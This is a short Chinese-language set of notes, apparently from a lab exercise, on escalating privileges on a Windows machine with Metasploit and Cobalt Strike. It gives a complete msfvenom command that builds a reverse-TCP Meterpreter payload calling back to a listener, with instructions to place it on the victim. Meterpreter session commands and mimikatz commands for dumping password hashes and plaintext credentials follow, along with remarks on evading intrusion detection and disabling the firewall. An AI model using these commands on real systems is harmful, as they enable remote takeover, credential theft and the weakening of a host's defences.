(๑•⌄•๑)
3借用metasploit,cobaltstrike来辅助提权
ps: Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。
kali中 打开cmd就在当前文件夹下输入命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=6666 -f exe > 666.exe
得到666.exe文件 将其复制到受害机上(可通过共享文件夹 可参考此链接:https://jingyan.baidu.com/article/aa6a2c141d04a74d4d19c430.html)
ps:reverse_tcp:这是一个基于TCP的反向链接反弹shell, 使用起来很稳定
kali上设置监听 打开受害机的666文件
run后发现还是低权限
提权
得到好几个exp 一个一个试(use加文件名)
background#返回,把meterpreter后台挂起 返回到msf
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
sesssions -k number #与会话进行交互
run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本
ps:.mimikatz
meterpreter > load mimikatz #加载mimikatz
meterpreter > msv #获取hash值
meterpreter > kerberos #获取明文
meterpreter >ssp #获取明文信息
meterpreter > wdigest #获取系统账户信息
meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示
meterpreter >mimikatz_command -f hash:: #获取目标 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
不断的试 use+漏洞利用名称
第三个试出来了 getuid发现是system权限
cs
cobaltstrike:加插件 图形化利用
通过提权可以得到一个高权限的用户身份 之后可以做很多事情:开启远程桌面 关闭防火墙 抓密码 抓hash。。